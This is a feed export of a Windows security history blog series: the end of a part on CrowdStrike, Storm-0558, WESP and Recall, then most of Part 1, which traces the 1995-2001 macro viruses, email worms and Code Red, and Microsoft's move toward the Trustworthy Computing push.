No. Microsoft is *transitioning* AV and EDR to user mode via WESP, which opened in MVI 3.0 private preview in July 2025 [@wri-jun26-2025] [@ms-securityweek-wesp]. Microsoft is *separately* deprecating the legacy Cross-Signing Program in the April 14, 2026 Windows security update, beginning in evaluation mode with a 100-runtime-hour and 2-or-3-restart criterion [@techcommunity-cross-signing]. No public document names a hard categorical ban date. WHCP-certified kernel drivers continue to load. See section 4.3.

No. PatchGuard prevents in-kernel patching of protected kernel structures by other in-kernel code. It does nothing about a signed, KMCS-trusted, third-party driver loading malformed configuration data into a kernel-resident process -- the CrowdStrike Channel File 291 pattern [@crowdstrike-rca-pdf]. The vendor&apos;s own data pipeline is the failure surface PatchGuard was never designed to cover. See section 4.3.

The honest answer: SFI has produced measurable deliverables on identity and signing-key custody. The April 2025 report quantifies the identity-SDK validation lift from 73% to 90%, the MSA signing-key move to hardware-backed security modules with automatic rotation, and the MSA signing service migration to Azure Confidential VMs [@sfi-apr-2025]. The September 2024 report formalizes the executive-compensation tie-in [@sfi-sept-2024]. Whether the same compounding occurs on the supply-chain and human-OPSEC axes is the open empirical question. The institutional change is real; whether it durably shifts the security culture is still being measured. See sections 4.1 and 9.

No. Pluton can be used *as* a TPM or *with* a discrete TPM. The configuration is OEM-determined and per-SKU [@pluton-docs]. &quot;Pluton present&quot; is not the same as &quot;Pluton acting as TPM&quot;; confirm via `Get-Tpm` and BIOS toggle inspection. See section 4.5.

No. SQL Server 2019 Always Encrypted with secure enclaves, generally available November 4, 2019, is the substrate precedent [@sql-always-encrypted-enclaves]. The correct narrower claim is that Recall is the first VBS-Enclave deployment in the Windows desktop shell to face sustained adversarial review by named external researchers. See section 4.2.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-security-wars-part-6&quot; keyTerms={[
  { term: &quot;CSRB&quot;, definition: &quot;Cyber Safety Review Board -- the United States public-private review board that ruled the Storm-0558 breach preventable on April 2, 2024.&quot; },
  { term: &quot;MSA&quot;, definition: &quot;Microsoft Account -- the consumer-tier identity tenant whose 2016 signing key was used in the Storm-0558 token-forgery primitive against enterprise Exchange Online.&quot; },
  { term: &quot;KMCS&quot;, definition: &quot;Kernel-Mode Code Signing -- the Windows policy that requires every kernel driver to be signed by a certificate chaining to a Microsoft-trusted root.&quot; },
  { term: &quot;MVI&quot;, definition: &quot;Microsoft Virus Initiative -- the program for vetting third-party endpoint security vendors that ship code into Windows.&quot; },
  { term: &quot;VBS Enclave&quot;, definition: &quot;Virtualization-based Security Enclave -- a user-mode trustlet inside Virtual Trust Level 1 with attested code identity; the substrate for Recall Generation 3.&quot; },
  { term: &quot;Channel File&quot;, definition: &quot;CrowdStrike&apos;s term for the Rapid Response Content delivery unit interpreted at runtime by the in-kernel Content Interpreter inside the Falcon sensor.&quot; },
  { term: &quot;WESP&quot;, definition: &quot;Windows Endpoint Security Platform -- the user-mode API surface for endpoint security vendors announced at Build 2025 and opened to MVI 3.0 partners in July 2025.&quot; },
  { term: &quot;Cross-Signing Program&quot;, definition: &quot;The legacy KMCS trust path whose deprecation begins April 14, 2026 in evaluation mode on Windows 11 24H2, 25H2, 26H1, and Server 2025.&quot; },
  { term: &quot;Prompt Injection&quot;, definition: &quot;Per OWASP LLM01, the class of attacks in which adversary-controlled text causes a large language model to take an unintended action; indirect prompt injection is the EchoLeak template.&quot; },
  { term: &quot;ML-KEM / ML-DSA / SLH-DSA&quot;, definition: &quot;The three NIST post-quantum primitives finalized August 13, 2024 (FIPS 203, 204, 205).&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The 2023-2026 era is the first in NT&apos;s history in which the layer above the OS -- the institution&apos;s own identity-token custody, the third-party kernel-mode security vendor, and the AI feature application plane -- became the load-bearing security boundary under public scrutiny while the OS layer kept hardening. SFI, WESP, the Recall Generation-3 architecture, and the April 14, 2026 Cross-Signing trust deprecation are Microsoft&apos;s first sustained engineering re-architecture of all three soft spots in parallel. Whether the response lands in time for the 2026 ransomware wave is the open forward question of Part 7.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The 2006-2009 EU-engagement settlement was an honest engineering compromise of its time -- the AV industry needed a sanctioned kernel path; Microsoft needed PatchGuard not to be antitrust-actionable; customers needed both. The compromise survived eighteen years because the failure mode the era worried about was the &lt;em&gt;malicious&lt;/em&gt; kernel-resident driver, and KMCS plus the Vulnerable Driver Blocklist eventually contained that mode. What it never tested was a non-malicious data-parsing bug in a sanctioned, signed driver at fleet scale. The morning of July 19, 2024 ran that test once. The verdict came in twenty bytes.&lt;/p&gt;
</content:encoded><category>windows-security</category><category>crowdstrike</category><category>storm-0558</category><category>secure-future-initiative</category><category>wesp</category><category>recall</category><category>ai-security</category><category>The Windows Security Wars</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Two Months Without Code: The Windows Security Wars Part 1 (1995-2001)</title><link>https://paragmali.com/blog/two-months-without-code-the-windows-security-wars-part-1-199/</link><guid isPermaLink="true">https://paragmali.com/blog/two-months-without-code-the-windows-security-wars-part-1-199/</guid><description>In 1995-2001 the worms won. The Trustworthy Computing memo and the ten-week Windows Security Push that followed taught the industry how to ship secure software.</description><pubDate>Sat, 30 May 2026 00:00:00 GMT</pubDate><content:encoded>
Between 1995 and 2001, Microsoft shipped the most-used operating system on Earth into an Internet it was not architecturally prepared for. Concept, Melissa, ILOVEYOU, Code Red, Nimda, and Slammer demonstrated that reactive patching could not win the speed race with weaponized exploits. On Tuesday, January 15, 2002 at 5:22 PM Pacific, Bill Gates sent the roughly 1,500-word &quot;Trustworthy computing&quot; memo. On February 11, 2002, approximately 8,500 Windows engineers stopped writing features and spent about ten weeks and one hundred million dollars on threat modeling, banned-API review, fuzzing, and the first mandatory Final Security Review gate. The result was the Microsoft Security Development Lifecycle (SDL), and every secure-development framework the industry has standardized since (BSIMM, OWASP SAMM, ISO/IEC 27034, NIST SSDF, SLSA, CISA Secure by Design) traces back to it.
&lt;h2&gt;1. Two Months Without Code&lt;/h2&gt;
&lt;p&gt;On Monday, February 11, 2002, in Building 26 of Microsoft&apos;s Redmond campus, Brian Valentine -- Senior Vice President of the Windows Division -- told roughly 8,500 Windows engineers to stop writing features [@howard-lipner-push-2003] [@washtech-microsoft-100m] [@msft-news-valentine-mms-2002]. For the next ten weeks they would sit through mandatory secure-coding training, threat-model every component they owned, audit their code against a published banned-API list, and gate-review every change through a Final Security Review checkpoint that had not existed three weeks earlier [@howard-lipner-push-2003] [@lipner-acsac-2004]. The cost: about one hundred million dollars in foregone feature work [@washtech-microsoft-100m]. The order traced, precisely, to a 1,500-word email Bill Gates had sent twenty-seven days earlier at 5:22 PM Pacific [@gates-memo-wired] [@helpwithwindows-billg].&lt;/p&gt;
&lt;p&gt;Stop and notice what that means. An operating-system vendor whose product ran on most business desktops on the planet ordered its largest engineering organization to &lt;em&gt;stop shipping the product&lt;/em&gt; for two months. The lost revenue is the easy number. The hard number is the implicit admission: a company halts an engineering org of that size only when the cost of &lt;em&gt;not&lt;/em&gt; halting is bigger.&lt;/p&gt;
&lt;p&gt;What does a company have to lose before its CEO writes that order?&lt;/p&gt;
&lt;p&gt;This article is the answer. It traces the seven-year run-up that made halting development the proportionate response, the memo that called the halt, the ten-week operation that followed, and the discipline that pattern became -- the discipline every secure-development framework on the industry shelf in 2026 traces back to.&lt;/p&gt;
&lt;p&gt;It is also a quarrel with one sentence. The literal version of the article&apos;s working claim is this:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&quot;Microsoft did not have a security team until January 15, 2002.&quot;&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That sentence is wrong in exactly the way every popular retelling of this era is wrong. Microsoft did have a security team. It had the Microsoft Security Response Center (MSRC), founded in 1998 and reachable from MS98-001 onward [@msrc-org] [@howard-lipner-push-2003]. It had the Secure Windows Initiative (SWI), a small in-house secure-development team running since around 2000 under Michael Howard [@howard-lipner-push-2003]. It had STRIDE, a categorized threat list written internally on April 1, 1999 by Loren Kohnfelder and Praerit Garg [@shostack-tm-book]. It had Howard and David LeBlanc&apos;s &lt;em&gt;Writing Secure Code&lt;/em&gt;, published by Microsoft Press in November 2001 and reportedly required reading for every Microsoft engineer [@howard-leblanc-wsc]. The methodology, the books, the team, and the published threat list were all in the building.&lt;/p&gt;
&lt;p&gt;By section 5, this article earns a stronger -- and defensible -- version of the literal claim. Hold the literal sentence loosely; the corrected one is worth more.&lt;/p&gt;
&lt;p&gt;The story turns on six names you will meet in sections 3 and 4: &lt;strong&gt;Concept&lt;/strong&gt; (July 1995), &lt;strong&gt;Melissa&lt;/strong&gt; (March 1999), &lt;strong&gt;ILOVEYOU&lt;/strong&gt; (May 2000), &lt;strong&gt;Code Red&lt;/strong&gt; (mid-July 2001), &lt;strong&gt;Nimda&lt;/strong&gt; (September 2001), and &lt;strong&gt;SQL Slammer&lt;/strong&gt; (January 2003) [@fsecure-concept] [@cert-ca-1999-04-melissa] [@cert-ca-2000-04-iloveyou] [@caida-codered] [@cert-ca-2001-26-nimda] [@caida-slammer]. Each name is also a generation of attack. Each generation broke an assumption the previous defenses had quietly depended on. By the end of 2001, the cumulative effect was a vendor whose customers no longer believed it could keep them safe.&lt;/p&gt;
&lt;p&gt;That is what a company loses before its CEO halts development. How it got there takes seven years to tell. Begin at the architectural starting line.&lt;/p&gt;
&lt;h2&gt;2. Two Windowses, Two Security Stories&lt;/h2&gt;
&lt;p&gt;The first surprise of the era is structural. There were two Windowses, and only one of them had a security model at all.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;NT line&lt;/strong&gt; -- Windows NT 3.1 in July 1993, NT 3.5, NT 4.0 in 1996, Windows 2000 in February 2000 -- was the work of David Cutler&apos;s team, hired by Microsoft in August 1988 with about twenty colleagues from Digital Equipment Corporation [@zachary-showstopper] [@msft-lifecycle-products]. Cutler had led the VMS operating-system project at DEC, and he carried VMS&apos;s engineering discipline into NT: a formal kernel/executive separation, an &lt;a href=&quot;https://paragmali.com/blog/the-object-manager-namespace/&quot; rel=&quot;noopener&quot;&gt;object manager&lt;/a&gt; that treated every kernel-allocated thing as a named object with a security descriptor attached, and a small kernel component called the &lt;strong&gt;Security Reference Monitor&lt;/strong&gt; whose only job was to consult that descriptor on every access attempt [@russinovich-solomon-iw2k] [@msft-access-control].NT was &lt;em&gt;patterned on VMS&lt;/em&gt;, not literally inherited from it. DEC threatened legal action against Microsoft over the engineering similarities and Cutler&apos;s role; the parties resolved the dispute through the 1995 DEC-Microsoft alliance, in which Microsoft paid roughly $105 million (including $75 million to bolster DEC&apos;s NT service-and-support operation) and committed to keeping Windows NT supported on DEC&apos;s Alpha processor [@techmonitor-dec-microsoft-alliance] [@zachary-showstopper].&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Win9x line&lt;/strong&gt; -- Windows 95 in August 1995, Windows 98 in June 1998, Windows Me in September 2000 -- shared a name and a Start menu with NT and almost nothing else [@msft-lifecycle-products]. Underneath, Win9x was a 32-bit graphical shell wrapped around the 16-bit DOS kernel. It had no SIDs, no per-object access control lists, no kernel-mediated access check, no concept of process identity at all. Every process ran with effective access to every file on disk, every key in the registry, and every other process&apos;s address space [@russinovich-solomon-iw2k].&lt;/p&gt;

The kernel component of Windows NT (and every NT-line OS since: 2000, XP, Vista, 7, 8, 10, 11) that performs the access check on a securable object. When a thread asks to open a file, the I/O manager hands the request to the object manager, which calls the SRM. The SRM compares the access token attached to the thread (which carries the user&apos;s SID and the SIDs of every group the user belongs to) against the security descriptor on the object (which carries the DACL listing who is allowed which access rights). If the DACL grants the requested rights, the open succeeds; otherwise it fails with `STATUS_ACCESS_DENIED`.

Every securable Windows kernel object carries a security descriptor with two access control lists. The **DACL** (Discretionary Access Control List) is an ordered list of ACEs (Access Control Entries) that grant or deny specific rights to specific principals. The **SACL** (System Access Control List) is the audit list; it tells the kernel which access attempts to log to the Security event log. The owner of an object can edit its DACL; only an administrator with the `SeSecurityPrivilege` right can edit its SACL.

A variable-length binary identifier that names a principal -- a user, a group, a computer, a service. SIDs have a defined structure (revision, identifier authority, sub-authorities) and are unique within their authority. Windows uses SIDs internally because they are stable across renames and translatable across trust boundaries; human-readable names like `DOMAIN\jdoe` are convenience labels that get resolved to SIDs before any access check runs.
&lt;p&gt;When a thread on NT asks to open a file, the path through the kernel looks like this:&lt;/p&gt;

flowchart TD
    A[User thread requests open] --&amp;gt; B[I/O Manager builds IRP]
    B --&amp;gt; C[Object Manager looks up named object]
    C --&amp;gt; D[Security Reference Monitor]
    D --&amp;gt; E[Compare access token SIDs against DACL ACEs]
    E --&amp;gt; F{&quot;Granted rights ≥ desired access?&quot;}
    F --&amp;gt;|Yes| G[Return handle with granted access mask]
    F --&amp;gt;|No| H[Return STATUS_ACCESS_DENIED]
&lt;p&gt;That pipeline is what made NT, in principle, a hardened operating system from its first release in 1993. It is the same pipeline every NT-line Windows has executed for thirty-three years; Microsoft&apos;s current public reference still describes the same primitives [@msft-access-control].&lt;/p&gt;
&lt;p&gt;So why was NT not, in practice, the hardened operating system the architecture promised?&lt;/p&gt;
&lt;p&gt;The answer is the load-bearing observation of the era&apos;s first half: &lt;strong&gt;the primitives existed; the defaults rendered them inert.&lt;/strong&gt; Through NT 3.1, NT 3.5, NT 4.0, and well into Windows 2000, the default DACL on huge swaths of the filesystem and registry was &lt;code&gt;Everyone: Full Control&lt;/code&gt;. The &lt;code&gt;Everyone&lt;/code&gt; SID matches every authenticated user and, depending on configuration, often the anonymous logon as well. A DACL that grants &lt;code&gt;Everyone: Full Control&lt;/code&gt; is a permission check that always succeeds. Microsoft&apos;s documentation of the era is matter-of-fact about this: the defaults were preserved to maintain application-compatibility expectations carried over from the Win9x world, where applications had been written assuming no permission check at all [@russinovich-solomon-iw2k].&lt;/p&gt;

On a clean Windows NT 4.0 install, the per-directory ACL table that Microsoft Knowledge Base article Q148437 (&quot;Default NTFS Permissions in Windows NT&quot;) preserved verbatim made the gap operationally concrete [@kb-q148437-wayback]. Two directories illustrate the pattern. **`%SystemRoot%\repair`** -- the destination of `rdisk /s`, where the SAM, SECURITY, SOFTWARE, SYSTEM, and DEFAULT registry hives get backed up -- shipped with **`Everyone: Full Control`** [@kb-q148437-wayback]. Any unprivileged interactive user could read or replace the SAM-hive backup. **`%SystemRoot%\system32`** -- the directory the LSA, user-mode subsystems, and print spooler load DLLs from -- shipped with **`Everyone: Change`** (RWXD), so an unprivileged user could write into the system DLL search path [@kb-q148437-wayback]. The same table records two more `Everyone: Full Control` directories in the default install: `%SystemRoot%\system32\spool\drivers\w32x86\1` (print drivers) and `%SystemRoot%\system32\wins` (the WINS service) [@kb-q148437-wayback]. Three of the era&apos;s most-exploited primitives -- SAM-hive theft, DLL hijack, print-spooler abuse -- mapped directly to defaults the OS shipped with. Windows 2000 tightened many of these; XP and Server 2003 tightened more; the cleanup was not nominally complete until Vista&apos;s UAC redesign in 2006. The architecture did not change. The defaults did.
&lt;p&gt;The Win9x side has no such defense-of-the-defaults story to tell, because Win9x had no access check to default. On a Win98 box, the file &lt;code&gt;c:\windows\system\kernel32.dll&lt;/code&gt; was simply &lt;em&gt;a file&lt;/em&gt;. Any program could open it, read it, write it, or rename it. The phrase &quot;least privilege&quot; did not apply, because there was no privilege to constrain.&lt;/p&gt;
&lt;p&gt;This is the architectural starting line of the era. Two Windowses, two stories, one shared problem: the strongest version had a security model that defaults defeated, and the weakest had no security model to defeat in the first place. Both, in the tens of millions, were about to be connected to a public Internet that did not yet exist when either had been designed.&lt;/p&gt;
&lt;p&gt;What happens when you connect that pair of architectures to that network is the next two sections.&lt;/p&gt;
&lt;h2&gt;3. The Attack Class That Cracked Office (1995-2000)&lt;/h2&gt;
&lt;p&gt;Open with a small artifact. Sometime in mid-1995, copies of a Microsoft CD-ROM shipped to customers carrying, by accident, the first widely distributed Word macro virus. It was called &lt;strong&gt;Concept&lt;/strong&gt;. Its only payload was a benign dialog and a comment in the macro source that read &lt;code&gt;REM That&apos;s enough to prove my point&lt;/code&gt; [@fsecure-concept] [@virusencyclopedia-concept].&lt;/p&gt;
&lt;p&gt;That was the joke. Then the rest of the industry stopped laughing.&lt;/p&gt;

A program that infects documents (rather than executables) by hijacking the document format&apos;s embedded scripting language. Word&apos;s WordBasic in 1995 and VBA in 1997 could read and write files, manipulate the host application, and -- critically -- run automatically on document open via `AutoOpen` and on document save via `FileSaveAs`. A macro virus is the same shape as a classical file-infector virus, except its host file is `.doc` instead of `.exe` and its execution surface is the application that opens the document, not the operating system that runs the binary.

**VBScript** is a Microsoft scripting language, syntactically a subset of Visual Basic, designed for embedding in web pages (in Internet Explorer) and standalone scripts (run by WSH). **Windows Script Host** is the Windows component that executes scripts written in VBScript, JScript, or other registered languages, via the executables `wscript.exe` (windowed) and `cscript.exe` (console). WSH was first shipped with Windows 98 and was available as an optional add-on for NT 4.0 and Windows 95. It was on by default; a `.vbs` file double-clicked in Explorer ran in `wscript.exe` without further confirmation.
&lt;p&gt;The era&apos;s three Office-style artifacts each carried a lesson the next one had to escalate past.&lt;/p&gt;
&lt;h3&gt;Concept (July 1995)&lt;/h3&gt;
&lt;p&gt;Concept was a WordBasic macro virus written for Microsoft Word 6.x. On document open it ran an &lt;code&gt;AutoOpen&lt;/code&gt; macro that copied itself into Word&apos;s global template &lt;code&gt;NORMAL.DOT&lt;/code&gt;. Every document Word saved from that point on inherited the infection, because every &lt;code&gt;FileSaveAs&lt;/code&gt; operation now ran through the infected template&apos;s hook [@fsecure-concept].First-in-the-wild detection of Concept is canonically dated to &lt;strong&gt;July 1995&lt;/strong&gt;, per the Microsoft Defender Threat Encyclopedia and the Virus Encyclopedia [@defender-concept-encyclopedia] [@virusencyclopedia-concept]. The &quot;September 1995&quot; date often cited in retellings refers to CIAC Notes 95-12, the bulletin, not the first detection [@ciac-i-023-macro].&lt;/p&gt;
&lt;p&gt;Concept was cross-platform: it infected Word for Windows 6.x/7.x and Word for Macintosh 6.x, because WordBasic was portable [@fsecure-concept]. By the time it was named and tracked, copies had shipped on at least one Microsoft CD-ROM and on training materials from at least one other software vendor [@ciac-i-023-macro].&lt;/p&gt;
&lt;p&gt;The lesson hidden in Concept is bigger than the virus. Any application that ships with a Turing-complete macro language, an auto-execute hook, and a write-enabled global template ships an execution surface. The user did not have to &quot;run a program&quot;; opening a document &lt;em&gt;was&lt;/em&gt; running a program, because the document carried the program inside it. That was the first time the popular distinction between &quot;data&quot; and &quot;executable&quot; failed at consumer scale.&lt;/p&gt;
&lt;h3&gt;Melissa (March 26, 1999)&lt;/h3&gt;
&lt;p&gt;Four years later, that lesson met email.&lt;/p&gt;
&lt;p&gt;CERT/CC&apos;s advisory CA-1999-04 records the moment: &quot;At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus&quot; [@cert-ca-1999-04-melissa]. The virus was written in VBA (the successor to WordBasic that Office 97 introduced) by a New Jersey programmer named David L. Smith.&lt;/p&gt;
&lt;p&gt;It carried the now-standard &lt;code&gt;AutoOpen&lt;/code&gt; infection of &lt;code&gt;NORMAL.DOT&lt;/code&gt;, but it added something Concept could not have done in 1995: it opened Microsoft Outlook through the MAPI interface, walked the first fifty entries of every address book it could read, and emailed the infected document to each one [@cert-ca-1999-04-melissa]. For good measure, it lowered Office&apos;s macro security settings on each infected machine, so the next infected document would run its macro without a prompt [@cert-ca-1999-04-melissa].&lt;/p&gt;
&lt;p&gt;The propagation pattern is worth a diagram of its own:&lt;/p&gt;

sequenceDiagram
    participant U as User
    participant W as Word
    participant N as NORMAL.DOT
    participant O as Outlook MAPI
    participant R as 50 recipients
    U-&amp;gt;&amp;gt;W: Open list.doc attachment
    W-&amp;gt;&amp;gt;W: Fire AutoOpen macro
    W-&amp;gt;&amp;gt;N: Infect NORMAL.DOT
    W-&amp;gt;&amp;gt;O: Read first address book
    O--&amp;gt;&amp;gt;W: Return 50 entries
    W-&amp;gt;&amp;gt;R: Send list.doc to each
    R-&amp;gt;&amp;gt;U: Recipients open list.doc
    Note over W,N: Loop repeats per recipient
&lt;p&gt;The math of the loop is uncomfortable. If each infected user has at least one populated fifty-entry address book and a non-trivial fraction of recipients open the attachment, the early growth is geometric in fan-out. No spam filter of the era could outrun it, because the senders were not spammers -- they were the recipient&apos;s actual colleagues, sending a document they had actually edited, from a real email address with a real return path. Address-book amplification by trusted senders is, by definition, a self-amplifying email feedback loop.&lt;/p&gt;
&lt;p&gt;Melissa&apos;s payload was deliberately benign (it inserted a Simpsons quote into the open document on certain dates), but its propagation forced corporate email shutdowns at a long list of Fortune 500 sites within seventy-two hours [@cert-ca-1999-04-melissa].Contemporaneous trade press reported shutdowns at Lockheed Martin, Lucent, Microsoft, and others. The CERT advisory itself describes a &quot;widespread attack affecting a variety of sites&quot; without naming specific companies. Smith was arrested April 1, 1999.&lt;/p&gt;
&lt;p&gt;The lesson the industry should have read off Melissa: &lt;em&gt;a macro that can read the address book is not an Office decision; it is a platform decision&lt;/em&gt;. Office let macros call Outlook because the COM-automation model invited it; Outlook let other applications read the address book because that was the entire point of MAPI. The trust boundary the user &lt;em&gt;thought&lt;/em&gt; was around their inbox was, in API terms, around every other application running as the same user.&lt;/p&gt;
&lt;h3&gt;ILOVEYOU (May 4-5, 2000)&lt;/h3&gt;
&lt;p&gt;Thirteen months later, the lesson generalized off the Office platform.&lt;/p&gt;
&lt;p&gt;CERT/CC&apos;s advisory CA-2000-04 names the attachment: &lt;code&gt;LOVE-LETTER-FOR-YOU.TXT.vbs&lt;/code&gt;, with a &quot;Love Letter&quot; subject line and a body asking the recipient to &quot;kindly check the attached LOVELETTER&quot; [@cert-ca-2000-04-iloveyou]. The &lt;code&gt;.vbs&lt;/code&gt; extension matters. ILOVEYOU was not a Word macro virus.Popular retellings group Concept, Melissa, and ILOVEYOU as one continuous Office-macro story. They are not. ILOVEYOU was a &lt;strong&gt;VBScript / Windows Script Host email worm&lt;/strong&gt;, executed by &lt;code&gt;wscript.exe&lt;/code&gt; when the user double-clicked the attachment in Outlook [@cert-ca-2000-04-iloveyou]. The execution surface is WSH, not Office.&lt;/p&gt;
&lt;p&gt;It was a VBScript file -- a script in plain text, executed by &lt;code&gt;wscript.exe&lt;/code&gt;. Windows Explorer&apos;s default setting, &quot;hide extensions for known file types,&quot; hid the &lt;code&gt;.vbs&lt;/code&gt; suffix from the filename column. The user saw &lt;code&gt;LOVE-LETTER-FOR-YOU.TXT&lt;/code&gt;, an apparently inert text file, and double-clicked it. Explorer handed the file to its registered handler, which was &lt;code&gt;wscript.exe&lt;/code&gt;, which ran it.&lt;/p&gt;
&lt;p&gt;Once running, the script copied itself into the Windows system directory, registered itself to run at every boot, overwrote files with selected extensions (&lt;code&gt;.jpg&lt;/code&gt;, &lt;code&gt;.mp3&lt;/code&gt;, &lt;code&gt;.vbs&lt;/code&gt;), and -- like Melissa -- mailed itself to every address it could reach through Outlook. BBC News, datelined Thursday May 4, 2000 19:28 GMT, recorded the outbreak appearing first in Hong Kong, sweeping the US State Department, CIA, FBI, Pentagon, White House, and Congress, and the UK House of Commons, the Danish parliament, the Swiss federal government, and banks across Europe within hours, with reports pointing to a Philippine origin [@bbc-love-bug-2000-05-04] [@cert-ca-2000-04-iloveyou]. Trade-press damage estimates of &quot;tens of millions&quot; of infected machines and &quot;billions of dollars&quot; in cleanup were folk-knowledge of the era; the underlying classification as a VBScript / WSH email worm is what survives in the primary record [@cert-ca-2000-04-iloveyou].&lt;/p&gt;
&lt;p&gt;The lesson ILOVEYOU should have forced: Windows Script Host was on by default, hidden extensions concealed the executable surface, and Outlook&apos;s auto-execute-attachments behavior treated &lt;code&gt;.vbs&lt;/code&gt; like any other attachment. Three Microsoft platform decisions, each individually defensible, composed into a one-double-click remote code execution path on a freshly installed Windows 98 machine.&lt;/p&gt;
&lt;p&gt;The three artifacts collapse into a single comparison table:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Execution surface&lt;/th&gt;
&lt;th&gt;Propagation vector&lt;/th&gt;
&lt;th&gt;On by default?&lt;/th&gt;
&lt;th&gt;Primary lesson&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;July 1995&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Concept&lt;/strong&gt; [@fsecure-concept] [@virusencyclopedia-concept]&lt;/td&gt;
&lt;td&gt;Word WordBasic macro&lt;/td&gt;
&lt;td&gt;Infected document opened in Word&lt;/td&gt;
&lt;td&gt;Yes (macro auto-exec)&lt;/td&gt;
&lt;td&gt;A document is an executable when the application supports macros.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;March 1999&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Melissa&lt;/strong&gt; [@cert-ca-1999-04-melissa]&lt;/td&gt;
&lt;td&gt;Word VBA macro&lt;/td&gt;
&lt;td&gt;Word + Outlook MAPI; 50 address-book entries per infected host&lt;/td&gt;
&lt;td&gt;Yes (macro auto-exec, MAPI access)&lt;/td&gt;
&lt;td&gt;A macro with address-book access creates a self-amplifying email storm by trusted senders.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;May 2000&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;ILOVEYOU&lt;/strong&gt; [@cert-ca-2000-04-iloveyou]&lt;/td&gt;
&lt;td&gt;VBScript via Windows Script Host (&lt;code&gt;wscript.exe&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Outlook attachment, double-extension hidden by Explorer default&lt;/td&gt;
&lt;td&gt;Yes (WSH on by default, extensions hidden)&lt;/td&gt;
&lt;td&gt;The &quot;Office macro&quot; attack class generalized to any double-clickable script the platform interpreted.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Document-as-execution-surface had a known fix shape from the moment Concept shipped: disable auto-execute, prompt the user, and -- eventually -- block by default. The block-by-default fix, for &lt;a href=&quot;https://paragmali.com/blog/attack-surface-reduction-rules-the-quiet-layer-that-stopped-/&quot; rel=&quot;noopener&quot;&gt;Office VBA macros&lt;/a&gt; downloaded from the internet, did not fully ship until February 2022, &lt;strong&gt;twenty-seven years after Concept&lt;/strong&gt; [@ms-learn-internet-macros-blocked]. Section 9 walks the deprecation playbook that delay is evidence for.&lt;/p&gt;
&lt;p&gt;But document execution is only half of the era&apos;s attack story. What happens when the execution surface is not a document the user opened, but a network port a worm reached without the user doing anything at all?&lt;/p&gt;
&lt;h2&gt;4. The Attack Class That Cracked the Server (2001-2003)&lt;/h2&gt;
&lt;p&gt;Two dates frame the whole story.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;June 18, 2001:&lt;/strong&gt; Microsoft publishes Security Bulletin MS01-033, &quot;Unchecked Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise.&quot; The bulletin patches an unchecked stack buffer in &lt;code&gt;idq.dll&lt;/code&gt;, the Indexing Service ISAPI extension loaded by Internet Information Services (IIS) 4.0 and 5.0. A specially crafted HTTP &lt;code&gt;GET&lt;/code&gt; to a URL ending in &lt;code&gt;.ida&lt;/code&gt; can overflow the buffer and execute attacker-supplied code in the IIS worker process, which runs as &lt;code&gt;LocalSystem&lt;/code&gt; [@ms01-033-idq].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;July 19, 2001:&lt;/strong&gt; thirty-one days later, the second-generation Code Red worm saturates roughly &lt;strong&gt;359,000 IIS servers&lt;/strong&gt; in under fourteen hours [@caida-codered] [@cert-ca-2001-19-codered]. The worm reaches its victims via a single HTTP GET. No user clicks. No email attachment. No double-click. A web server with port 80 open to the Internet and the unpatched &lt;code&gt;idq.dll&lt;/code&gt; is, by definition, &lt;em&gt;already&lt;/em&gt; listening for the attack.&lt;/p&gt;

A computing monoculture exists when a large population of independently administered hosts run identical software with identical defaults. The security significance is statistical: a single vulnerability discovered in the monoculture&apos;s shared software is, in expectation, exploitable against the entire population. The 2001-2003 Windows-server worms (Code Red, Nimda, Slammer) are the canonical case studies; CAIDA&apos;s Code Red measurement and Moore et al.&apos;s Slammer measurement are the empirical anchors that made the monoculture argument quantitative rather than rhetorical [@caida-codered] [@caida-slammer].
&lt;p&gt;What kind of defense survives a thirty-one-day patch-to-mass-exploitation window? The next seven months answer that question four different ways.&lt;/p&gt;
&lt;h3&gt;Code Red I (mid-July 2001)&lt;/h3&gt;
&lt;p&gt;A Northern California security boutique called eEye Digital Security discovered and reverse-engineered the worm. Marc Maiffret and Ryan Permeh named it &quot;Code Red&quot; after the Mountain Dew flavor they were drinking through the analysis [@eeye-codered-ii].Popular retellings sometimes date the discovery to July 13, 2001. The eEye back-reference in their August 4, 2001 Code Red II advisory points at advisory &lt;code&gt;AL20010717&lt;/code&gt; -- &lt;strong&gt;July 17, 2001&lt;/strong&gt; [@eeye-codered-ii]. &quot;Mid-July 2001&quot; or &quot;July 17, 2001&quot; is the better-attested date. The Mountain Dew naming detail comes from contemporaneous interviews with the eEye analysts, not the AL20010804 advisory itself.&lt;/p&gt;
&lt;p&gt;The initial Code Red variant -- &quot;Code Red v1&quot; -- carried a fixed-seed random-number generator in its IP scanner. Because every infected host generated the same sequence of scan targets, the worm spent most of its scanning budget on the same small set of IP addresses, and its spread was bounded. It was annoying. It was not yet a measurement event.&lt;/p&gt;
&lt;p&gt;That changed when somebody fixed the scanner.&lt;/p&gt;
&lt;h3&gt;Code Red v2 (July 19, 2001)&lt;/h3&gt;
